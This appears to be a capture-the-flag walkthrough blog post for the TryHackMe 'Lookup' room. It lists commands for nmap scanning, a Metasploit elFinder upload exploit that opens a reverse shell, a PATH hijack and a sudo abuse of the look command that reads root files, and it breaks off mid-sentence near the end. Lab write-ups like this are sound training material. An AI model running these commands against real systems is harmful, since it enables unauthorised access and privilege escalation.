Post

Tryhackme Lookup Walkthrough - Pentest Lab Notes

Posted
By
1 min read
Tryhackme Lookup Walkthrough - Pentest Lab Notes

πŸ” TryHackMe - Lookup Room Walkthrough

Welcome to the walkthrough for the Lookup room on TryHackMe. This challenge involves web enumeration, file upload exploitation, reverse shell access, and privilege escalation using Linux misconfigurations.

πŸ“Œ Room Details

  • Platform: TryHackMe
  • Room: Lookup
  • Difficulty: Easy–Intermediate
  • Focus: Web exploitation, file upload, reverse shell, privilege escalation

1. Nmap Enumeration

1

nmap -A -F -oN nmap.txt 10.10.83.34

πŸ” Open Ports

1
2
3

22/tcp - SSH (OpenSSH 8.2p1 Ubuntu)

80/tcp - HTTP (Apache 2.4.41)

2. Web Enumeration

1
2
3
4
5
6
7
8
9

Web interface presents a login form.

Valid credentials found:

    admin : --------

    jose : password123

Application running: elFinder file manager

3. Exploit: File Upload (elFinder + Metasploit)

1
2
3
4
5
6

msfconsole
use exploit/unix/webapp/elfinder_php_upload_exec
set RHOSTS files.lookup.thm
set LHOST tun0
set LPORT 9999
run

🎯 Meterpreter shell received as user: www-data

4. Shell Upgrade

To upgrade to an interactive shell:

1

python3 -c 'import pty; pty.spawn("/bin/bash")'

5. PATH Hijack via Fake id Binary

To spoof the environment:

1
2
3

echo -e '#!/bin/bash\necho "uid=33(think) gid=33(www-data) groups=33(www-data)"' > /tmp/id
chmod +x /tmp/id
export PATH=/tmp:$PATH

Verify hijack:

1

id

6. Lateral Movement β€” Switch to think

1
2

su think
Password: ----------------

βœ”οΈ Switched to user think

7. Privilege Escalation Using look

Check sudo privileges:

1

sudo -l

Output:

(ALL) NOPASSWD: /usr/bin/look

Abuse the look command to read the root and user flag:

1

sudo /usr/bin/look '' /root/root.txt

Flags

1
2

User Flag: Found in /home/think/user.txt
Root Flag: Found in /root/root.txt

βœ… Summary Phase Technique Initial Access Metasploit – elFinder Upload Exploit Shell Upgrade pty.spawn() User Enumeration PATH hijack via fake id Lateral Movement su think using password from output Privilege Escalation sudo /usr/bin/look to read root flag 🧠 Key Takeaways

1
2
3

Always run sudo -l as soon as you escalate to a new user.

PATH hijacking can allow you
tryhackme, walkthrough
ctf enumeration exploit Lookup writeups htb writeups tryhackme Linux wordpress cracking walkthrough
This post is licensed under CC BY 4.0 by the author.